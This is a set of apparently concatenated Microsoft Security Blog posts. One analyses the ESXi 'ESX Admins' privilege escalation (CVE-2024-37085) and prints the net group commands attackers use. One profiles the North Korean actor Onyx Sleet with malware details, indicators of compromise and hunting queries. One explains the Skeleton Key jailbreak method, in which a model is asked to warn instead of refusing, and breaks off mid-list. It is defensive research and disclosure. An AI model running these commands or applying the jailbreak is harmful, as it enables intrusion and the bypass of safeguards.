The vulnerability, identified as CVE-2024-37085, involves a domain group whose members are granted full administrative access to the ESXi hypervisor by default without proper validation. Microsoft disclosed the findings to VMware through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR), and VMWare released a security update. Microsoft recommends ESXi server administrators to apply the updates released by VMware to protect their servers from related attacks, and to follow the mitigation and protection guidance we provide in this blog post. We thank VMWare for their collaboration in addressing this issue.

This blog post presents analysis of the CVE-2024-37085, as well as details of an attack that was observed by Microsoft to exploit the vulnerability. We’re sharing this research to emphasize the importance of collaboration among researchers, vendors, and the security community to continuously advance defenses for the larger ecosystem. As part of Microsoft’s commitment to improve security for all, we will continue to share intelligence and work with the security community to help protect users and organizations across platforms.

CVE-2024-37085 vulnerability analysis

Microsoft security researchers identified a new post-compromise technique utilized by ransomware operators like Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest in numerous attacks. In several cases, the use of this technique has led to Akira and Black Basta ransomware deployments. The technique includes running the following commands, which results in the creation of a group named “ESX Admins” in the domain and adding a user to it:

net group “ESX Admins” /domain /add

net group “ESX Admins” username /domain /add

While investigating the attacks and the described behavior, Microsoft researchers discovered that the threat actors’ purpose for using this command was to utilize a vulnerability in domain-joined ESXi hypervisors that allows the threat actor to elevate their privileges to full administrative access on the ESXi hypervisor. This finding was reported as part of a vulnerability disclosure to VMware earlier this year.

Further analysis of the vulnerability revealed that VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named “ESX Admins” to have full administrative access by default. This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist. Additionally, the membership in the group is determined by name and not by security identifier (SID).

Microsoft researchers identified three methods for exploiting this vulnerability:

1. Adding the “ESX Admins” group to the domain and adding a user to it – This method is actively exploited in the wild by the abovementioned threat actors. In this method, if the “ESX Admins” group doesn’t exist, any domain user with the ability to create a group can escalate privileges to full administrative access to domain-joined ESXi hypervisors by creating such a group, and then adding themselves, or other users in their control, to the group.
2. Renaming any group in the domain to “ESX Admins” and adding a user to the group or use an existing group member – This method is similar to the first, but in this case the threat actor needs a user that has the capability to rename some arbitrary groups and rename one of them to “ESX Admins”. The threat actor can then add a user or use a user that already exists in the group, to escalate privileges to full administrative access. This method was not observed in the wild by Microsoft.
3. ESXi hypervisor privileges refresh – Even if the network administrator assigns any other group in the domain to be the management group for the ESXi hypervisor, the full administrative privileges to members of the “ESX Admins” group are not immediately removed and threat actors still could abuse it. This method was not observed in the wild by Microsoft.

Successful exploitation leads to full administrative access to the ESXi hypervisors, allowing threat actors to encrypt the file system of the hypervisor, which could affect the ability of the hosted servers to run and function. It also allows the threat actor to access hosted VMs and possibly to exfiltrate data or move laterally within the network.

Ransomware operators targeting ESXi hypervisors

Over the last year, we have seen ransomware actors targeting ESXi hypervisors to facilitate mass encryption impact in few clicks, demonstrating that ransomware operators are constantly innovating their attack techniques to increase impact on the organizations they target.

ESXi is a popular product in many corporate networks, and in recent years, we have observed ESXi hypervisors become a favored target for threat actors. These hypervisors could be convenient targets if ransomware operators want to stay under the SOC’s radar because of the following factors:

1. Many security products have limited visibility and protection for an ESXi hypervisor.
2. Encrypting an ESXi hypervisor file system allows one-click mass encryption, as hosted VMs are impacted. This could provide ransomware operators with more time and complexity in lateral movement and credential theft on each device they access.

Therefore, many ransomware threat actors like Storm-0506, Storm-1175, Octo Tempest, Manatee Tempest, and others support or sell ESXi encryptors like Akira, Black Basta, Babuk, Lockbit, and Kuiper (Figure 1). The number of Microsoft Incident Response (Microsoft IR) engagements that involved the targeting and impacting ESXi hypervisors have more than doubled in the last three years.

Storm-0506 Black Basta ransomware deployment

Earlier this year, an engineering firm in North America was affected by a Black Basta ransomware deployment by Storm-0506. During this attack, the threat actor used the CVE-2024-37085 vulnerability to gain elevated privileges to the ESXi hypervisors within the organization.

The threat actor gained initial access to the organization via Qakbot infection, followed by the exploitation of a Windows CLFS vulnerability (CVE-2023-28252) to elevate their privileges on affected devices. The threat actor then used Cobalt Strike and Pypykatz (a Python version of Mimikatz) to steal the credentials of two domain administrators and to move laterally to four domain controllers.

On the compromised domain controllers, the threat actor installed persistence mechanisms using custom tools and a SystemBC implant. The actor was also observed attempting to brute force Remote Desktop Protocol (RDP) connections to multiple devices as another method for lateral movement, and then again installing Cobalt Strike and SystemBC. The threat actor then tried to tamper with Microsoft Defender Antivirus using various tools to avoid detection.

Microsoft observed that the threat actor created the “ESX Admins” group in the domain and added a new user account to it, following these actions, Microsoft observed that this attack resulted in encrypting of the ESXi file system and losing functionality of the hosted virtual machines on the ESXi hypervisor.   The actor was also observed to use PsExec to encrypt devices that are not hosted on the ESXi hypervisor. Microsoft Defender Antivirus and automatic attack disruption in Microsoft Defender for Endpoint were able to stop these encryption attempts in devices that had the unified agent for Defender for Endpoint installed.

Mitigation and protection guidance

Microsoft recommends organizations that use domain-joined ESXi hypervisors to apply the security update released by VMware to address CVE-2024-37085. The following guidelines will also help organizations protect their network from attacks:

• Install software updates – Make sure to install the latest security updates released by VMware on all domain-joined ESXi hypervisors. If installing software updates is not possible, you can use the following recommendations to reduce the risk:
  • Validate the group “ESX Admins” exists in the domain and is hardened.
  • Manually deny access by this group by changing settings in the ESXi hypervisor itself. If full admin access for the Active Directory ESX admins group is not desired, you can disable this behavior using the advanced host setting: ‘Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd’.
  • Change the admin group to a different group in the ESXi hypervisor.
  • Add custom detections in XDR/SIEM for the new group name.  
  • Configure sending ESXi logs to a SIEM system and monitor suspicious full administrative access.
• Credential hygiene – To utilize the different vulnerability methods, threat actors require control of a highly privileged user in the organization. Therefore, our recommendation is making sure to protect your highly privileged accounts in the organization, especially those that can manage other domain groups:
  • Enforce multifactor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, always.
  • Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to this article for the different authentication methods and features.
  • Isolate privileged accounts from productivity accounts to protect administrative access to the environment. Refer to this article to understand best practices.
• Improve critical assets posture – Identify your critical assets in the network, such as  ESXi hypervisors and vCenters (a centralized platform for controlling VMware vSphere environments), and make sure to get them protected with latest security updates, proper monitoring procedures and backup and recovery plans. More information can be found in this article.
• Identify vulnerable assets – Use Microsoft Defender Vulnerability Management to reduce risk with continuous vulnerability assessment of ESXi hypervisor out of the box.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint             

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

• Suspicious modifications to ESX Admins group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• New group added suspiciously
• Suspicious Windows account manipulation
• Compromised account conducting hands-on-keyboard attack

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

• Suspicious creation of ESX group

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft Defender Threat Intelligence to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments:

• Storm-0506
• Storm-1175
• Octo Tempest 
• Manatee Tempest
• Akira
• Black Basta

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks

This query identifies ESXi hypervisors in the organization:

DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId

This query identifies ESX Admins group changes in the Active directory:

IdentityDirectoryEvents
| where Timestamp >= ago(30d)
| where AdditionalFields has ('esx admins')

The following queries are for assessing the already discovered ESXi with the Microsoft Defender Vulnerability Management information:

DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId
| join kind=inner (DeviceTvmSoftwareVulnerabilities) on DeviceId
DeviceInfo
| where OSDistribution =~ "ESXi"
| summarize arg_max(Timestamp, *) by DeviceId
| join kind=inner (DeviceTvmSecureConfigurationAssessment) on DeviceId

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Microsoft Sentinel also has a range of hunting queries available in Sentinel GitHub repo or as part of Sentinel solutions that customers can use to detect the activity detailed in this blog in addition to Microsoft Defender detections. These hunting queries include the following:

Qakbot:

• Qakbot hunting queries

Cobalt Strike:

• Cobalt Strike DNS Beaconing
• Potential ransomware activity related to Cobalt Strike
• Suspicious named pipes
• Cobalt Strike Invocation using WMI

References

• https://knowledge.broadcom.com/external/article?legacyId=1025569
• https://core.vmware.com/vmware-vsphere-8-security-configuration-guide
• https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html
• https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html
• https://www.sygnia.co/blog/esxi-ransomware-attacks/?blaid=6088911https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/
• https://www.darkreading.com/cloud-security/agenda-ransomware-vmware-esxi-servers
• https://blog.checkpoint.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/amp/
• https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/amp/

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption appeared first on Microsoft Security Blog.

First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet’s ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors.

Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. In this blog, we will share intelligence about Onyx Sleet and its historical tradecraft and targets, as well as our analysis of recent malware campaigns, with the goal of enabling the broader community to identify and respond to similar campaigns. We also provide protection, detection, and hunting guidance to help improve defenses against these attacks.

Who is Onyx Sleet?

Onyx Sleet conducts cyber espionage primarily targeting military, defense, and technology industries, predominately in India, South Korea, and the United States. This threat actor has historically leveraged spear-phishing as a means of compromising target environments; however, in recent campaigns, they have mostly exploited N-day vulnerabilities, leveraging publicly available and custom exploits to gain initial access. In October 2023, Onyx Sleet exploited the TeamCity CVE-2023-42793 vulnerability as a part of a targeted attack. Exploiting this vulnerability enabled the threat actor to perform a remote code execution attack and gain administrative control of the server.

Onyx Sleet develops and uses a spectrum of tools that range from custom to open source. They have built an extensive set of custom remote access trojans (RATs) that they use in campaigns, and routinely developed new variants of these RATs to add new functionality and implement new ways of evading detection. Onyx Sleet often uses leased virtual private servers (VPS) and compromised cloud infrastructure for command-and-control (C2).

Onyx Sleet is tracked by other security companies as APT45, SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, and TDrop2.

Affiliations with other threat actors originating from North Korea

Onyx Sleet has demonstrated affiliations with other North Korean actors, indicating its integration with a broader network of North Korean cyber operations. Microsoft has observed an overlap between Onyx Sleet and Storm-0530. Both groups were observed operating within the same infrastructure and were involved in the development and use of ransomware in attacks in late 2021 and 2022.

Onyx Sleet targets

In pursuit of its primary goal of intelligence collection, Onyx Sleet has focused on targeting entities in the defense and energy industries, predominately in India, South Korea, and the United States. Recent attacks include the targeting of South Korean educational institutions, construction companies, and manufacturing organizations in May 2024. Onyx Sleet has also shown interest in taking advantage of online gambling websites, possibly for financial gain either on behalf of North Korea or for individual members of the group.

Onyx Sleet tradecraft

Onyx Sleet has used the same tactics, techniques, and procedures (TTPs) over extended periods, suggesting the threat actor views its tradecraft as effective. Onyx Sleet historically leveraged spear-phishing to compromise targets, and in more recent campaigns, they have been observed to primarily use exploits for initial access, alongside a loader, downloader, and backdoor as a part of its well-established attack chain.

Onyx Sleet nevertheless made some changes, for example, adding new C2 servers and hosting IPs, creating new malware, and launching multiple campaigns over time. In the past, Onyx Sleet introduced custom ransomware strains as a part of its campaigns. It also created and deployed the RAT identified by Kaspersky as Dtrack, which was observed in global attacks from September 2019 to January 2024. The Dtrack RAT follows the common attack chain used by Onyx Sleet and includes the exploitation of the Log4j 2 CVE-2021-44228 vulnerability for initial access and the use of payloads signed with an invalid certificate masquerading as legitimate software to evade detection.

Another example of Onyx Sleet introducing variations in the implementation of its attack chain is the campaign identified by AhnLab Security Intelligence Center (ASEC) in May 2024. In this campaign, the threat actor employed a previously unseen malware family dubbed as Dora RAT. Developed in the Go programming language, this custom malware strain targeted South Korean educational institutions, construction companies, and manufacturing organizations. 

Onyx Sleet avoids common detection techniques across its attack lifecycle by heavily using custom encryption and obfuscation algorithms and launching as much of its code in memory as possible. These tools and techniques have been observed in several reported campaigns, including TDrop2.

Onyx Sleet has also used several off-the shelf tools, including Sliver, remote monitoring and management (RMM) tools SOCKS proxy tools, Ngrok, and masscan. We have also observed Onyx Sleet using commercial packers like Themida and VMProtect to obfuscate their malware. In January 2024, Microsoft Threat Intelligence identified a campaign attributed to Onyx Sleet that deployed a Sliver implant, an open-source C2 framework that supports multiple operators, listener types, and payload generation. Like the Dtrack RAT, this malware was signed with an invalid certificate impersonating Tableau software. Further analysis revealed that this Onyx Sleet campaign compromised multiple aerospace and defense organizations from October 2023 to June 2024.

Apart from the previously mentioned Log4j 2 vulnerability, Onyx Sleet has exploited other publicly disclosed (N-day) vulnerabilities to gain access to target environments. Some vulnerabilities recently exploited by Onyx Sleet include:

• CVE-2023-46604 (Apache ActiveMQ)
• CVE-2023-22515 (Confluence)
• CVE-2023-27350 (PaperCut)
• CVE-2023-42793 (TeamCity)

In addition to these well-known and disclosed vulnerabilities, Onyx Sleet has used custom exploit capabilities in campaigns targeting users mostly in South Korea. In these campaigns, Onyx Sleet exploited vulnerabilities in a remote desktop/management application, a data loss prevention application, a network access control system, and an endpoint detection and response (EDR) product.

Recent malware campaigns

In December 2023, South Korean authorities attributed attacks that stole over 1.2 TB of data from targeted South Korean defense contractors using custom malware to Andariel. Microsoft has attributed several custom malware families used in the said attacks – TigerRAT, SmallTiger, LightHand, and ValidAlpha – to Onyx Sleet.

TigerRAT

Since 2020, Onyx Sleet has been observed using the custom RAT malware TigerRAT. In some campaigns using TigerRAT, Onyx Sleet exploited vulnerabilities in Log4j 2 to deliver and install the malware. When launched, this malware can steal confidential information and carry out commands, such as keylogging and screen recording, from the C2.

SmallTiger

In February 2024, ASEC identified SmallTiger, a new malware strain targeting South Korean defense and manufacturing organizations. During the process of lateral movement, this malware is delivered as a DLL file (SmallTiger[.]dll) and uses a C2 connection to download and launch the payload into memory. Microsoft researchers have determined that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida or VMProtect packed executable.

The SmallTiger campaign can be tied back to a campaign using a similar attack chain beginning in November 2023 that delivered the DurianBeacon RAT malware. In May 2024, Microsoft observed Onyx Sleet continuing to conduct attacks targeting South Korean defense organizations using SmallTiger.

LightHand

LightHand is a custom, lightweight backdoor used by Onyx Sleet for remote access of target devices. Via LightHand, Onyx Sleet can execute arbitrary commands through command shell (cmd.exe), get system storage information, perform directory listing, and create/delete files on the target device.

ValidAlpha (BlackRAT)

ValidAlpha (also known as BlackRAT) is a custom backdoor developed in the Go programming language and used by Onyx Sleet to target organizations globally in the energy, defense, and engineering sectors since at least 2023. ValidAlpha can run an arbitrary file, list contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands.

Samples of ValidAlpha analyzed by Microsoft had a unique PDB string: I:/01___Tools/02__RAT/Black/Client_Go/Client.go

Recommendations

Microsoft recommends the following mitigations to defend against attacks by Onyx Sleet:

• Keep software up to date. Apply new security patches as soon as possible.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
• Enable network protection to help prevent access to malicious domains.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to help resolve breaches, significantly reducing alert volume

Microsoft Defender customers can turn on attack surface reduction rules to help prevent common attack techniques used by Onyx Sleet:

• Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• Block execution of potentially obfuscated scripts
• Block JavaScript or VBScript from launching downloaded, executable content

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware families:

• CertutilPE
• Dora
• LightHand
• SmallTiger
• TigerCrypt
• TigerRAT
• ValidAlpha

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

• Onyx Sleet activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

• Document contains macro to download a file

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2023-42793 (TeamCity)
• CVE-2023-27350 (Papercut)
• CVE-2021-44228 (Log4j 2)

Microsoft Defender Threat Intelligence

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

• Tool Profile: Dtrack
• Onyx Sleet targeting defense firm in the Middle East
• Onyx Sleet targets electrical equipment manufacturer in India
• Onyx Sleet exploits vulnerable VMWare Horizon servers
• Onyx Sleet using Sliver remote access trojan in attacks on aerospace and defense
• Same Targets, new playbooks: East Asia threat actors employ unique methods

Microsoft Sentinel queries

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Use this query to assess the existence of vulnerabilities used by Onyx Sleet:

DeviceTvmSoftwareVulnerabilities  
| where CveId in ("CVE-2021-44228","CVE-2023-27350","CVE-2023-42793")   
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware 

Use this query to detect associated network IOCs:

let remoteip = dynamic(["84.38.134.56","45.155.37.101","213.139.205.151","109.248.150.147","162.19.71.175","147.78.149.201"]);
let remoteurl = dynamic(["americajobmail.site","privatemake.bounceme.net","ww3c.bounceme.net","advice.uphearth.com","http://84.38.134.56/procdump.gif"]);
DeviceNetworkEvents  
| where RemoteIP == remoteip or RemoteUrl == remoteurl 
| project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort,RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Use this query to detect associated file IOCs:

let selectedTimestamp = datetime(2024-07-17T00:00:00.0000000Z);  
let fileName = "SmallTiger.dll";  
let FileSHA256 = dynamic(["f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c","0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207 ","29c6044d65af0073424ccc01abcb8411cbdc52720cac957a3012773c4380bab3","fed94f461145681dc9347b382497a72542424c64b6ae6fcf945f4becd2d46c32","868a62feff8b46466e9d63b83135a7987bf6d332c13739aa11b747b3e2ad4bbf","f1662bee722a4e25614ed30933b0ced17b752d99fae868fbb326a46afa2282d5","1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1","3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061","8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f","7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"]);  
let SignerName = "INVALID:Tableau Software Inc.";  
let Signerhash = "6624c7b8faac176d1c1cb10b03e7ee58a4853f91";  
let certificateserialnumber = "76cb5d1e6c2b6895428115705d9ac765";  
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,  
DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)  
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from July 17th runs the search backwards for 90 days, change the above date accordingly.  
and   
( FileName == fileName or OldFileName == fileName or ProfileName == fileName or InitiatingProcessFileName == fileName or InitiatingProcessParentFileName == fileName  
or InitiatingProcessVersionInfoInternalFileName == fileName or InitiatingProcessVersionInfoOriginalFileName == fileName or PreviousFileName == fileName  
or ProcessVersionInfoInternalFileName == fileName or ProcessVersionInfoOriginalFileName == fileName or DestinationFileName == fileName or SourceFileName == fileName  
or ServiceFileName == fileName or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256) or Signer == SignerName or SignerHash == Signerhash or CertificateSerialNumber == certificateserialnumber )

Indicators of compromise

IP addresses

• 84.38.134[.]56
• 45.155.37[.]101
• 213.139.205[.]151
• 109.248.150[.]147
• 162.19.71[.]175
• 147.78.149[.]201

URL

• hxxp://84.38.134[.]56/procdump.gif

Actor-controlled domain

• americajobmail[.]site
• privatemake.bounceme[.]net
• ww3c.bounceme[.]net
• advice.uphearth[.]com

SHA-256

• TigerRAT
  • f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
  • 0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207
  • 29c6044d65af0073424ccc01abcb8411cbdc52720cac957a3012773c4380bab3
  • fed94f461145681dc9347b382497a72542424c64b6ae6fcf945f4becd2d46c32
  • 868a62feff8b46466e9d63b83135a7987bf6d332c13739aa11b747b3e2ad4bbf
• LightHand
  • f1662bee722a4e25614ed30933b0ced17b752d99fae868fbb326a46afa2282d5
  • 1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1
  • 3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061
  • 8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f
  • 7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b
• ValidAlpha
  • c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
  • c1a09024504a5ec422cbea68e17dffc46472d3c2d73f83aa0741a89528a45cd1

Fake Tableau certificate

• Signer: INVALID:Tableau Software Inc.
• SignerHash: 6624c7b8faac176d1c1cb10b03e7ee58a4853f91
• CertificateSerialNumber: 76cb5d1e6c2b6895428115705d9ac765

References

• https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
• https://asec.ahnlab.com/en/66088/
• https://www.helpnetsecurity.com/2013/07/08/dissecting-operation-troy-cyberespionage-in-south-korea/
• https://unit42.paloaltonetworks.com/inside-tdrop2-technical-analysis-of-new-dark-seoul-malware/
• https://securelist.com/my-name-is-dtrack/93338/
• https://www.virustotal.com/gui/file/96118268f9ab475860c3ae3edf00d9ee944d6440fd60a1673f770d150bfb16d3/details
• https://www.reuters.com/technology/cybersecurity/north-korea-hackers-may-have-stolen-data-laser-weapon-police-2023-12-06/
• https://asec.ahnlab.com/en/56405/
• https://blog.talosintelligence.com/lazarus-magicrat/
• https://asec.ahnlab.com/ko/65918/
• https://www.boho.or.kr/en/bbs/view.do?searchCnd=&bbsId=B0001041&searchWrd=&menuNo=205083&pageIndex=1&categoryCode=&nttId=36276

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Onyx Sleet uses array of malware to gather intelligence for North Korea appeared first on Microsoft Security Blog.

As we discussed in a previous blog post about AI jailbreaks, an AI jailbreak could cause the system to violate its operators’ policies, make decisions unduly influenced by a user, or execute malicious instructions.     

In this blog, we’ll cover the details of a newly discovered type of jailbreak attack that we call Skeleton Key, which we covered briefly in the Microsoft Build talk Inside AI Security with Mark Russinovich (under the name Master Key). Because this technique affects multiple generative AI models tested, Microsoft has shared these findings with other AI providers through responsible disclosure procedures and addressed the issue in Microsoft Azure AI-managed models using Prompt Shields to detect and block this type of attack. Microsoft has also made software updates to the large language model (LLM) technology behind Microsoft’s additional AI offerings, including our Copilot AI assistants, to mitigate the impact of this guardrail bypass.

Introducing Skeleton Key

This AI jailbreak technique works by using a multi-turn (or multiple step) strategy to cause a model to ignore its guardrails. Once guardrails are ignored, a model will not be able to determine malicious or unsanctioned requests from any other. Because of its full bypass abilities, we have named this jailbreak technique Skeleton Key.

This threat is in the jailbreak category, and therefore relies on the attacker already having legitimate access to the AI model. In bypassing safeguards, Skeleton Key allows the user to cause the model to produce ordinarily forbidden behaviors, which could range from production of harmful content to overriding its usual decision-making rules. Like all jailbreaks, the impact can be understood as narrowing the gap between what the model is capable of doing (given the user credentials, etc.) and what it is willing to do. As this is an attack on the model itself, it does not impute other risks on the AI system, such as permitting access to another user’s data, taking control of the system, or exfiltrating data.

To protect against Skeleton Key attacks, as detailed in this blog, Microsoft has implemented several approaches to our AI system design and provides tools for customers developing their own applications on Azure. Below, we also share mitigation guidance for defenders to discover and protect against such attacks.

Microsoft recommends customers who are building their own AI models and/or integrating AI into their applications to consider how this type of attack could impact their threat model and to add this knowledge to their AI red team approach, using tools such as PyRIT. (Note: Microsoft has updated PyRIT to include Skeleton Key)

In the next sections, we will discuss some of the known methods for exploiting generative AI models using the Skeleton Key technique, explain the steps we’re taking to address the risk, and provide guidance for the detection and mitigation of this threat. You can watch this video to learn more about how Microsoft approaches AI Red Teaming.

Attack flow

Skeleton Key works by asking a model to augment, rather than change, its behavior guidelines so that it responds to any request for information or content, providing a warning (rather than refusing) if its output might be considered offensive, harmful, or illegal if followed. This attack type is known as Explicit: forced instruction-following.

In one example, informing a model that the user is trained in safety and ethics, and that the output is for research purposes only, helps to convince some models to comply, as shown below:

When the Skeleton Key jailbreak is successful, a model acknowledges that it has updated its guidelines and will subsequently comply with instructions to produce any content, no matter how much it violates its original responsible AI guidelines.

During our testing, from April to May 2024, the jailbreak was shown to work on the following base models and hosted models:

• Meta Llama3-70b-instruct (base)
• Google Gemini Pro (base)
• OpenAI GPT 3.5 Turbo (hosted)
• OpenAI GPT 4o (hosted)
• Mistral Large (hosted)
• Anthropic Claude 3 Opus (hosted)
• Cohere Commander R Plus (hosted)

For each model that we tested, we evaluated a diverse set of tasks across risk and safety content categories, including areas such as explosives, bioweapons, political content, self-harm, racism, drugs, graphic sex, and violence. All the affected models complied fully and without censorship for these tasks, though with a warning note prefixing the output as requested. Unlike other jailbreaks like Crescendo, where models must be asked about tasks indirectly or with encodings, Skeleton Key puts the models in a mode where a user can directly request tasks, for example, “Write a recipe for homemade explosives”. Further, the model’s output appears to be completely unfiltered and reveals the extent of a model’s knowledge or ability to produce the requested content.

Consistent with responsible disclosure principles, Microsoft shared this research with the affected AI vendors before publication, helping them determine how to best address mitigations, as needed, in their respective products or services.

GPT-4 demonstrated resistance to Skeleton Key, except when the behavior update request was included as part of a user-defined system message, rather than as a part of the primary user input. This is something that is not ordinarily possible in the interfaces of most software that uses GPT-4, but can be done from the underlying API or tools that access it directly. This indicates that the differentiation of system message from user request in GPT-4 is successfully reducing attackers’ ability to override behavior.

Mitigation and protection guidance

Microsoft has made software updates to the LLM technology behind Microsoft’s AI offerings, including our Copilot AI assistants, to mitigate the impact of this guardrail bypass. Customers should consider the following approach to mitigate and protect against this type of jailbreak in their own AI system design:

• Input filtering: Azure AI Content Safety detects and blocks inputs that contain harmful or malicious intent leading to a jailbreak attack that could circumvent safeguards.
